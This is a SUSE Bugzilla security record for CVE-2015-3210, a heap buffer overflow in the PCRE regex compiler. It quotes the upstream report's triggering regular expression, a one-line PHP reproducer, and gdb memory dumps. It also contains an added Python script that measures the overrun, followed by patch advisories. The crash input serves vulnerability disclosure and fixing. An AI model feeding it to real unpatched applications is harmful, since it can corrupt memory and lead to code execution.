Bugzilla – Bug 933288
VUL-1: CVE-2015-3210 pcre: heap buffer overflow in pcre_compile2() / compile_regex()
Last modified: 2019-07-05 22:39:59 UTC
via oss-sec. The following issue was reported in the PCRE library:

"""
The latest version of PCRE is prone to a heap overflow vulnerability which could be caused by the following regular expression:

/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/

To reproduce the problem, we could use pcretest provided by the PCRE library, or applications which are wrapped with PCRE such as PHP. For pcretest, simply type the regular expression after the "re>" prompt. For PHP, the latest version, PHP 5.6.9 (wrapped with PCRE 8.37), could be triggered by the following code snippet:

<?php
preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/", "ADLAB", $arr);
?>

First, pcre_compile2 invokes compile_regex() to calculate the size of memory that is used to save the regular expression. re then points to the newly allocated memory with the size above. Next, pcre_compile2 invokes compile_regex() again to fill the regular expression into the allocated memory. The problem here is that more data is written than expected.

The following test was conveyed under Kali Linux (based on Debian x64) with PHP 5.6.9:
==============================================================
gdb php poc.php
9217        re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) x/10i $rip
=> 0x46f3cb <php_pcre_compile2+2187>:   mov    rdi,rbp
   0x46f3ce <php_pcre_compile2+2190>:   call   QWORD PTR [rax]
(gdb) x $rbp
0x97:   Cannot access memory at address 0x97
==============================================================
So the expected size of the above regular expression is 0x97 = 151, and the base address of the allocated memory is 0x1007480.

Here is the layout of 0x1007480 just before the second compile_regex:
==============================================================
(gdb) x/160x 0x1007480
0x1007480: [0x45 0x52 0x43 0x50 0x97 0x00 0x00 0x00
0x1007488:  0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1007490:  0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1007498:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074a0:  0x00 0x00 0x40 0x00 0x04 0x00 0x02 0x00
0x10074a8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074b0:  0xd0 0x7a 0x00 0x01 0x00 0x00 0x00 0x00
0x10074b8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074c0:  0x00 0x02 0x42 0x00 0x00 0x03 0x42 0x00
0x10074c8:  0x83 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074d0:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074d8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074e0:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074e8:  0x80 0x48 0xd8 0xf6 0xff 0x7f 0x00 0x00
0x10074f0:  0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00
0x10074f8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1007500:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1007508:  0x60 0x75 0x00 0x01 0x00 0x00 0x00 0x00
0x1007510:  0xff 0xff 0xff 0xff 0xff 0xff 0xff] 0xff
0x1007518:  0xa1 0x01 0x00 0x00 0x00 0x00 0x00 0x00
==============================================================

After the second compile_regex:
==============================================================
(gdb) x/160x 0x1007480
0x1007480: [0x45 0x52 0x43 0x50 0x97 0x00 0x00 0x00
0x1007488:  0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1007490:  0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1007498:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074a0:  0x00 0x00 0x40 0x00 0x04 0x00 0x02 0x00
0x10074a8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074b0:  0xd0 0x7a 0x00 0x01 0x00 0x00 0x00 0x00
0x10074b8:  0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074c0:  0x00 0x02 0x42 0x00 0x00 0x03 0x42 0x00
0x10074c8:  0x83 0x00 0x51 0x1b 0x73 0x00 0x00 0x00
0x10074d0:  0x02 0x85 0x00 0x45 0x00 0x01 0x73 0x00
0x10074d8:  0x00 0x00 0x02 0x83 0x00 0x22 0x85 0x00
0x10074e0:  0x07 0x00 0x02 0x1d 0x63 0x78 0x00 0x07
0x10074e8:  0x81 0x00 0x12 0x85 0x00 0x0c 0x00 0x03
0x10074f0:  0x1d 0x61 0x73 0x00 0x00 0x00 0x02 0x78
0x10074f8:  0x00 0x0c 0x78 0x00 0x12 0x78 0x00 0x22
0x1007500:  0x1d 0x3e 0x1d 0x57 0x1d 0x47 0x1d 0x58
0x1007508:  0x1d 0x43 0x1d 0x52 0x1d 0x45 0x1d 0x44
0x1007510:  0x1d 0x49 0x1d 0x54 0x1d 0x53 0x78] *0x00
0x1007518: *0x45 *0x78 *0x00 *0x51 0x00 0x00 0x00 0x00
==============================================================
Obviously, 5 more bytes are written on the heap in this case. This overflow can be used to modify the adjacent length field of an array/vector/string, giving the attacker the ability to read/write the whole memory in the context of the affected application (the same trick as CVE-2013-0634).
"""

Upstream bug: https://bugs.exim.org/show_bug.cgi?id=1636
> PCRE version > 8.33 (8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable).
> PCRE2 10.10 is also confirmed to be vulnerable.

Confirmed reproducer causes
*** Error in `pcretest': free(): invalid next size (normal): 0x0000000000707790 ***
on openSUSE 13.2 with fixes for bug 924960, bug 924961, bug 906574 installed.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1226918
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3210
http://seclists.org/oss-sec/2015/q2/600
http://seclists.org/oss-sec/2015/q2/601
http://seclists.org/oss-sec/2015/q2/602
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-3210.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3210
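An added check, not part of the bug report or of PCRE: a small Python script that takes the allocation base and the size computed by the first compile_regex() pass from the gdb session above, diffs the two byte dumps, and reports how far the second pass wrote past the allocation. The three embedded rows are copied from the end of the two dumps; the earlier rows lie entirely inside the allocation and do not affect the result.

```python
"""Confirm an out-of-bounds write from two gdb 'x/Nx' byte dumps (added example)."""
import re

# Sample input: the last three rows of the two dumps in the bug report,
# taken before and after the second compile_regex() pass.
BEFORE = """
0x1007508: 0x60 0x75 0x00 0x01 0x00 0x00 0x00 0x00
0x1007510: 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1007518: 0xa1 0x01 0x00 0x00 0x00 0x00 0x00 0x00
"""
AFTER = """
0x1007508: 0x1d 0x43 0x1d 0x52 0x1d 0x45 0x1d 0x44
0x1007510: 0x1d 0x49 0x1d 0x54 0x1d 0x53 0x78 0x00
0x1007518: 0x45 0x78 0x00 0x51 0x00 0x00 0x00 0x00
"""
BASE = 0x1007480  # pointer returned by PUBL(malloc) in the gdb session
SIZE = 0x97       # size computed by the first compile_regex() pass (151 bytes)

def parse_dump(text):
    """Map address -> byte value for each 'addr: b0 b1 ... b7' row of a gdb dump."""
    bytes_at = {}
    for line in text.strip().splitlines():
        addr_s, _, rest = line.partition(":")
        addr = int(addr_s, 16)
        for i, tok in enumerate(re.findall(r"0x[0-9a-fA-F]{2}", rest)):
            bytes_at[addr + i] = int(tok, 16)
    return bytes_at

def overrun(before_text, after_text, base, size):
    """Return (changed_oob_addrs, overrun_len).

    changed_oob_addrs: bytes at or past base+size whose value differs between
    the dumps.  overrun_len: distance from the allocation's end to the last
    changed byte, inclusive.  A byte rewritten with its old value is invisible
    to a diff, so overrun_len, not the count of changed bytes, is the number to
    compare with the "5 more bytes" in the report.
    """
    before, after = parse_dump(before_text), parse_dump(after_text)
    end = base + size
    changed = sorted(a for a in after if a >= end and before.get(a) != after[a])
    overrun_len = changed[-1] - end + 1 if changed else 0
    return changed, overrun_len

if __name__ == "__main__":
    addrs, n = overrun(BEFORE, AFTER, BASE, SIZE)
    print(f"allocation ends at {BASE + SIZE:#x}; {n} bytes written past it")
    print("changed out-of-bounds bytes:", [hex(a) for a in addrs])
```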
bugbot adjusting priority
This is an autogenerated message for OBS integration:
This bug (933288) was mentioned in
https://build.opensuse.org/request/show/437711 13.2 / pcre
openSUSE-SU-2016:2805-1: An update that solves 6 vulnerabilities and has three fixes is now available.

Category: security (moderate)
Bug References: 933288,933878,936227,942865,957566,957598,960837,971741,972127
CVE References: CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2016-1283,CVE-2016-3191
Sources used:
openSUSE 13.2 (src): pcre-8.39-3.8.1

SUSE-SU-2016:2971-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src): pcre-8.39-5.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src): pcre-8.39-5.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src): pcre-8.39-5.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): pcre-8.39-5.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): pcre-8.39-5.1
SUSE Linux Enterprise Server 12-SP2 (src): pcre-8.39-5.1
SUSE Linux Enterprise Server 12-SP1 (src): pcre-8.39-5.1
SUSE Linux Enterprise High Availability 12-SP2 (src): pcre-8.39-5.1
SUSE Linux Enterprise High Availability 12-SP1 (src): pcre-8.39-5.1
SUSE Linux Enterprise Desktop 12-SP2 (src): pcre-8.39-5.1
SUSE Linux Enterprise Desktop 12-SP1 (src): pcre-8.39-5.1

openSUSE-SU-2016:3099-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
openSUSE Leap 42.2 (src): pcre-8.39-6.1
openSUSE Leap 42.1 (src): pcre-8.39-5.1

SUSE-SU-2016:3161-1: An update that fixes 25 vulnerabilities is now available.

Category: security (moderate)
Bug References: 906574,924960,933288,933878,936227,942865,957566,957567,957598,957600,960837,971741,972127
CVE References: CVE-2014-8964,CVE-2015-2325,CVE-2015-2327,CVE-2015-2328,CVE-2015-3210,CVE-2015-3217,CVE-2015-5073,CVE-2015-8380,CVE-2015-8381,CVE-2015-8382,CVE-2015-8383,CVE-2015-8384,CVE-2015-8385,CVE-2015-8386,CVE-2015-8387,CVE-2015-8388,CVE-2015-8389,CVE-2015-8390,CVE-2015-8391,CVE-2015-8392,CVE-2015-8393,CVE-2015-8394,CVE-2015-8395,CVE-2016-1283,CVE-2016-3191
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src): pcre-8.39-7.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src): pcre-8.39-7.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src): pcre-8.39-7.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): pcre-8.39-7.1
SUSE Linux Enterprise Server for SAP 12 (src): pcre-8.39-7.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): pcre-8.39-7.1
SUSE Linux Enterprise Server 12-SP2 (src): pcre-8.39-7.1
SUSE Linux Enterprise Server 12-SP1 (src): pcre-8.39-7.1
SUSE Linux Enterprise Server 12-LTSS (src): pcre-8.39-7.1
SUSE Linux Enterprise High Availability 12-SP2 (src): pcre-8.39-7.1
SUSE Linux Enterprise High Availability 12-SP1 (src): pcre-8.39-7.1
SUSE Linux Enterprise Desktop 12-SP2 (src): pcre-8.39-7.1
SUSE Linux Enterprise Desktop 12-SP1 (src): pcre-8.39-7.1
looks fixed to me, but reevaluate yourself
is fixed